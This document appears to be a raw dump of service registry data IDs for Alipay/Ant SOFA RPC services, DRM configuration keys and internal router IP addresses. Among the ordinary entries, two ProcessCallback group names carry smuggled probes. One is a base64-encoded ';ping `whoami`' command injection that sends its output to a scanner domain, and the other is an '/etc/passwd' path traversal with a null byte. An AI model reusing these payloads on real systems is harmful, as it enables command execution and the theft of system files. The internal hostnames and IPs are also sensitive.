ipay.imtmsvcprod.common.service.facade.face.FaceBizTypeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.trsbrain.common.service.facade.service.SelfCureRecordQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.finstore.common.service.facade.fop.bops.DynamicLayoutManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.ALIPAYBUMNGJSESSIONID.zonePolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilelbs.common.service.facade.stepcounter.SportsStepQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paydecision.service.api.simple.PayChannelDecisionSimpleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opssla.common.service.facade.DrmLdcConstructFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.afsc.common.service.amc.service.AmcEventShareFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_192.168.5.125#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ebillcenter.common.service.facade.EbillBigDataCallBackFacade:1.0:edeductcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finvirtualta.core.service.fund.repository.FinTradeLogRepository:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insautomarket.common.facade.content.AntassistantTodoItemFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mydds:name=com.alipay.mydds.core.engine.drm.DdsDrmConfigResource.commonCache,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.necbill.common.service.guaranty.GuarantyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finnet.service.facade.flux.spi.FinnetReceiveService:1.0:overseaprod_remit@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:revmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.almcenter.service.facade.api.assetliability.AssetLiabilityBatchInfoManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insttrade:name=com.alipay.antvip.client.internal.drm.DrmControl.restrainEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Sub_Servers_TP_B_API#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:O3BpbmcgYHdob2FtaWAzMzAyNDg2OS0tMTA0MDAzMDI5LmFudHNjYW5uZXIuZ2xvYmFsLmFsaXBheS5jb207@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.assettrans.facade.api.AssetGlobalQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.trsbrain.biz.changecure.service.CurePlanTBFStrategyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeapcore:name=com.alipay.tradeapcore.common.service.integration.drm.resource.DrmForCommonManageResource.ignoreMCRRefundPayTool,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.pdcore.common.service.facade.ProductSyncFacade:1.0:ANTGW2CN@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pointmng:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.xfireConnectionPerHostInMosn,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.96.103#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.echox.service.EchoxAopPlaybackService:1.0:insclaimdecision@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ccr.facade.BillQueryBankConfigFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.mobilecodec.service.facade.CodeApiGFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","NS_Pub_Servers_TP_B_DIDCOMM#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mfinpromo.common.service.facade.api.activity.ActivityInfoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundselling.common.service.contract.facade.ContractCenterFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finslip:name=com.alipay.finsupport.component.cache.ctrldata.drm.CacheSwitchDRM.cacheLoadSourceDrm,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.iexratecenter.service.facade.api.ExClientRateQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.27.154#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.ipay.ipayment.service.facade.slip.query.SlipQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mydds:name=com.alipay.mydds.core.engine.drm.ServiceEnvResource.serviceEnv,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.csrobotmng.bot.facade.slot.BotSlotFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkloantrade.common.service.facade.lend.api.LendContractQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insqa.facade.gift.QueryGiftPolicyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.acctrans.facade.api.acctrans.AcctransQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.opencore.service.facade.auth.AuthFieldQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitydata:name=com.alipay.routeclient.DefaultRouteCoordinator.zoneColor,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fincommontaskhub.service.facade.service.spi.FinalizeService:1.0:finfundcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecodec.service.api.CodeApiFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.185.34#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-wealthcommontoolstwa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.fc.custview.facade.InvolvedPartyViewQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_30.50.42.33#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Pub_Servers_TP_MQ_HTTP_PROXY#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.ordermng:name=com.alipay.ordermng.common.util.drm.OrdermngDegradeDRM.newRateExtendInfoProdSales,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.gftms.facade.api.basic.CounterPartyQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openeco.facade.acceptance.AcceptanceTaskFileCreateFade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antassistant.biz.rest.DispatchRest#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.overseamng.rate.pms.PmsRateMerchantFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:inslifeprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.framodel.common.service.facade.api.ModelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.infosec.core.basic.TextCheckManager:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdiscountprod.common.service.facade.voucher.api.VoucherVerifyRecordQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.211.74#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.opensupport.common.service.facade.onestopmng.OstsPurchaseInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insproductcore.facade.service.InsFcCatalogQueryFacade:1.0:main@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.27.215#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.zpublish.common.service.facade.CallbackServiceFacade:1.0:cloudbox@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.alipay-demo:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.guardianConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fincommontaskhub.service.facade.service.api.MaintenanceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.giftprod.common.service.facade.mutualtask.MutualtaskServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insofflineinvest.common.service.facade.service.SecretNoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundprod.common.service.facade.scene.ActivityCardFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_INSTSVCMARKET#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agmcenter.common.service.facade.api.AgmTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.238.217#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_100.83.25.48#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.160.176.237#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.36.25.26#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.fcbuservice.common.service.facade.ProcessActionFacade:1.0:shagncheng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmCdsCrowdManager.cdsAllCrowdListStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zcbsalescenter.biz.appointment.SpecDateAppointmentService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchstm.common.service.facade.uniasset.OrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitydata:name=com.alipay.securitydata.common.service.client.gbase.impl.GeaBaseControlResourceImpl.syncProcess,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.omocore.common.assistant.api.AsrAssistManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.custcenter.service.facade.agaccesstoken.AgATKResourceItemManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.112.37#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.23.224.190#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.cicada.bizlogicide.common.service.facade.api.BizLogicUtilServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.schedule.concurrent.execute.Executer:1.0:EC_IRECON2_BANK_TRANSFER_ORDER_SEND_TASK@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasecore.service.v2.dynamic.facade.DynamicRuleDetailService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_JVCORE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.starwish.drm.impl.StarWishDrmImpl.minBuyAmount,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.abilitycore.common.service.facade.solution.SceneConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientSyncServiceFacade:1.0:test@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:mobilepep@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:fincommonbff@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.abilitycore.common.service.facade.secrecy.SecrecyQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.darwin.common.service.facade.api.LaunchAdminFacade:1.0:mobilegw@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insmerchantprod.common.service.ipp.ProductQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.custprod.service.api.AccountCancelOperateFacade:1.0:bkcloanprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fininfo:name=com.alipay.finsupport.component.cache.ctrldata.drm.NuccWhiteListDRM.nuccExchangeCodes,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.charge:name=com.alipay.charge.common.dal.conf.impl.ChargeNewDRMConfigureImpl.productPropertyConfigStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mservice.common.service.facade.api.workflow.PresKaDingFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.commonwealtech.antvv.app.facade.AntVVFacade:1.0:charityprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ufe.engine.facade.runtime.UfeFeatureCalService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acparamcore.facade.api.TemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:sigw@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.crmhome.common.service.facade.api.shop.CategoryManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:mw-result@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditauthfront.service.facade.query.PcreditAuthOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.frastress.common.service.facade.api.category.BizCategoryQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.security.sandbox.manager.facade.SecuritySandboxOpsCloudFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.claimoperation.common.service.ClaimAuditFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.127.178#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:rockfuzz@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.zonemng.query.facade.api.PartitionRuleQueryFacade:1.0:zonemng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iaccenter.facade.manage.api.SupportAccountDateManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:paascoregrayfive@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tradequery.common.service.facade.TradePaymentOrderQueryFacade:1.0:tradequeryhis@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rulemng.common.service.facade.testcase.ConditionTestCaseService:1.0:promo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:../../../../../../../../../../etc/passwd\u0000.@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.accountcore.common.service.facade.AccountTaskFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.process.bp.engine.call.BPCall:1.0:mrchis_cancel@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finslip:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.loadTestIslandQueueSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.lightmds.common.service.facade.mng.MngDbFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.177.90#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.atd:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.vmEmergencyDoubleCheck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:stepfunction-demo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.tsm.common.service.verify.facade.rpc.TsmVerifyServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpdcore:name=com.alipay.fc.prodquery.core.service.drm.PdCoreCacheRefreshDRM.cacheKeyForDelete,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.securitycore.common.service.facade.environment.api.EnvironmentManageService:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insleads.common.service.facade.InsLeadsBlockItemFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.cif.client.drm.TairToTbaseSwitch.shadowFullAccessToTbase,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbcdp.common.service.facade.space.SpaceInventroyQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.45.132.76#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Sub_Servers_TP-S-UNIFIEDLIMIT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.antcloud.infrastructure.facade.environment.EnvironmentExplorer:1.0:ODPS_USER@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.DataViewCalcService:1.0:antsecurity_ropservice@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.vega.keeper.core.service.basic.OpsDetailService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudprovision:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.checkAutoType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mfinsnsprod.service.facade.openapi.ProdOpenRelationFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdataprod.common.service.facade.interfaces.MerchantCRMDataService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promomng.common.service.facade.DiscountMonitorLogQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.huanyu.apibus.facade.ApiBusGatewayFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_C_MCARD#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:pcreditdmp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.cicada.common.service.facade.api.PageChildFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.184.9#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.cicada.common.service.facade.api.AppBranchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.finfundprod.common.service.facade.IndicatorQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.scheduler.common.service.facade.update.SchedulerTaskStrategyUpdateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecodec.component.manager.ProcessFlowManagerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbcontent.common.service.facade.api.content.ContentUtilFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instasset.common.service.integration.opscloudcore.OpsCloudClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.cfin.cfdmp.facade.api.LoginService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.wishTairCache.ldcTairWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.moee.common.service.facade.service.instance.RunInstanceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.imemberprod.service.facade.api.OperatorService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.exchangecore.common.service.facade.RevokePurchaseWService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lendpofprod.common.service.facade.api.apply.LendDemandQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.159.249.95#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Pub_Servers_TP_C_WITHDRAW_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:minicenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.mwalletmng.biz.iotcube.drm.IotcubeDrm.upgradeSyncRandomTime,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.meshysale.common.service.facade.batchtask.BatchTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfmng:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.guardianConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.tairmanager.interfaces.endpoint.facade.rest.tair.SubscribeFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.autoaftermarket.common.service.flow.AutoBehaviorFlowFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeapcore:name=com.alipay.routeclient.DefaultRouteCoordinator.grayKey,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.consumequery.common.service.facade.ConsumeRecordRzoneService4UserClose:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:finsnsbff#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","HEALTHY@finorm#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.charityasset.common.service.facade.api.AssetTransferFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.100.8#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.yebcore:name=com.alipay.yebcore.core.shared.drm.impl.PurchaseLimitDrmImpl.limitOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchiswisdom.topology.common.service.facade.api.topologyversion.TopologyVersionOperationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.afsc.common.service.tianxun.service.TxApkInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.amspm.insurance.service.repository.RuleDataRepositoryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentfactory.common.service.facade.appx.rule.RuleItemQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fincommontaskhub.service.facade.service.spi.ExecuteService:1.0:finpwm@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promokernel.common.service.facade.api.RelationRecordQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.depcore.service.facade.query.CommonVirtualAccountQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.test.SimpleService-26#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:fuelprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.taskcenter.common.service.facade.callback.Callback:1.0.0:pointmngPointTaskCenterCallback@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fincorecheck.common.service.facade.FMQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.voucherprod.facade.api.fund.VcpFundManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.25.226.46#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.admgr.common.service.facade.DeviceInspectServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:openexprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbtraffic.common.service.facade.api.schedule.ScheduleDtbCancelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.ordermng.apaysales_ds.slowSql,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zappinfo:name=com.alipay.common.security.dresource.SecurityCommonDrm.corsWhiteUrls,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Servers_TP_S_INSPLATFORM#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.holoxlib.core.change.facade.ChangeManageFacade:1.0:holoxChangeManageService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.186.98#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.166.168.161#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.iriskfaas.facade.SampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.secuprod.biz.service.gw.community.api.feed.FeedGwManager:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finbaservice.biz.shared.auth.service.AuthUserService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:batchpayprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finscprod.facade.prophet.UserEquityInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cfpcenter.emc.common.service.facade.api.AemcProcessManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insqa.facade.point.PointManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.uif.facade.tag.UifCustomerTagService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imatchfacade.common.service.facade.crowd.CrowdApiService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.giftprod.common.service.facade.word.WordCrowdCryptoFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchportalcore.common.service.link.facade.PraiseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialcore.facade.quality.SurveyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.vega-integration-kepler:name=com.alipay.routeclient.DefaultRouteCoordinator.rpcRouteByGroupWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.acctrans.core.config.drm.DrmGmtOrderSwitchConfigInterface:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.starwish.drm.impl.StarWishDrmImpl.notifyRemindAgenda,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchportalcore.common.service.merchant.facade.api.ShopInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_ZHIMACHECK#@#DEFAULT_IN